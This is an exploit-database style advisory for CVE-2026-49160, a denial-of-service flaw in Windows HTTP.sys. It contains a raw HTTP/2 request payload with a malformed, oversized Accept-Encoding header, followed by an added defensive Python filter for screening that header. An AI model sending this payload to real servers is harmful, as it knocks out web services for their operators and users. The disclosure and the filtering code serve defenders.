| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Uncontrolled Resource Consumption in Microsoft | 15 Jun 2026 18:30 | – | githubexploit |
| June Microsoft Patch Tuesday | 17 Jun 2026 09:00 | – | avleonov |
| CVE-2026-49160 | 9 Jun 2026 15:44 | – | circl |
| Microsoft HTTP.sys Resource Management Error Vulnerability | 9 Jun 2026 00:00 | – | cnnvd |
| CVE-2026-49160 | 9 Jun 2026 17:05 | – | cve |
| CVE-2026-49160 HTTP.sys Denial of Service Vulnerability | 9 Jun 2026 17:05 | – | cvelist |
| EUVD-2026-35588 | 9 Jun 2026 17:05 | – | euvd |
| June 9, 2026—KB5093998 (OS Build 22631.7219) | 9 Jun 2026 14:00 | – | mskb |
| June 9, 2026—KB5094122 (OS Build 14393.9234) | 9 Jun 2026 14:00 | – | mskb |
| June 9, 2026—KB5094123 (OS Build 17763.8880) | 9 Jun 2026 14:00 | – | mskb |

# Titles: CVE-2026-49160 - HTTP.sys HTTP/2 Denial of Service (DoS) Vulnerability
# Author: nu11secur1ty
# Date: 06/24/2026
# Vendor: Microsoft Corporation
# Software: Windows HTTP.sys (HTTP/2 Protocol Stack)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-49160
## Description:
A critical Denial of Service (DoS) vulnerability exists in the Windows
HTTP.sys kernel-mode driver, specifically in its handling of HTTP/2
protocol requests. The vulnerability, tracked as CVE-2026-49160, allows an
unauthenticated remote attacker to cause uncontrolled resource consumption
(CWE-400) by sending a specially crafted HTTP/2 request with an oversized
and malformed Accept-Encoding header. This triggers excessive memory
allocation and CPU utilization within HTTP.sys, effectively crashing the
service and rendering all dependent web services (such as IIS) unavailable.
The attack can be executed within seconds and does not require any form of
authentication or user interaction. All supported versions of Windows
Server (2016, 2019, 2022, 2025) and Windows client OS (10, 11) are affected
prior to the June 2026 security update.
STATUS: MEDIUM - HIGH/ Vulnerability
[+]Payload:
```http
POST / HTTP/2
Host: target.com
Accept-Encoding:
AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************stupiD,*,,
```
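An added example, not code from the advisory's author or from Microsoft: a screening function that a reverse proxy or WAF rule in front of HTTP.sys could apply to Accept-Encoding values, flagging the oversized, malformed shape described above. The byte and element limits, the coding allowlist, and the names used are assumptions; the empty-element rule is deliberately stricter than RFC 9110 requires.

```python
import re

# Assumed policy limits for a reverse proxy or WAF in front of HTTP.sys;
# they are not values from the advisory or from Microsoft.
MAX_VALUE_BYTES = 256
MAX_ELEMENTS = 16
KNOWN_CODINGS = {"gzip", "x-gzip", "deflate", "compress", "x-compress",
                 "br", "zstd", "identity", "*"}

# One RFC 9110 list element: a token, optionally followed by ";q=<qvalue>".
ELEMENT = re.compile(
    r"(?P<coding>[!#$%&'*+\-.^_`|~0-9A-Za-z]+)"
    r"(?:[ \t]*;[ \t]*[qQ]=(?:0(?:\.\d{0,3})?|1(?:\.0{0,3})?))?"
)


def screen_accept_encoding(value):
    """Return sorted rejection reasons for one header value ([] means pass)."""
    if value.strip(" \t") == "":
        return []  # an empty Accept-Encoding value is legal
    reasons = set()
    if len(value.encode("utf-8")) > MAX_VALUE_BYTES:
        reasons.add("oversized")
    elements = [e.strip(" \t") for e in value.split(",")]
    if len(elements) > MAX_ELEMENTS:
        reasons.add("too-many-elements")
    for element in elements:
        if element == "":
            reasons.add("empty-element")  # stricter than RFC 9110 (assumed policy)
            continue
        match = ELEMENT.fullmatch(element)
        if match is None:
            reasons.add("bad-syntax")
        elif match.group("coding").lower() not in KNOWN_CODINGS:
            reasons.add("unknown-coding")
    return sorted(reasons)


# Constructed sample values, not captured traffic.
SAMPLES = {
    "browser": "gzip, deflate, br, zstd",
    "weighted": "gzip;q=1.0, identity; q=0.5, *;q=0",
    "padded": "A" * 300 + ",BBBB&**,*,,",
    "bad-weight": "gzip;q=5",
    "long-list": ",".join(["gzip"] * 40),
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:10} {screen_accept_encoding(value) or 'pass'}")
```

A filter like this only reduces exposure at the edge; the fix the page names is the June 2026 security update.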
[+]Demo:
Video Demonstration
[url](https://www.patreon.com/nu11secur1ty/posts/cve-2026-49160-161926764)
Time spent:
00:01:20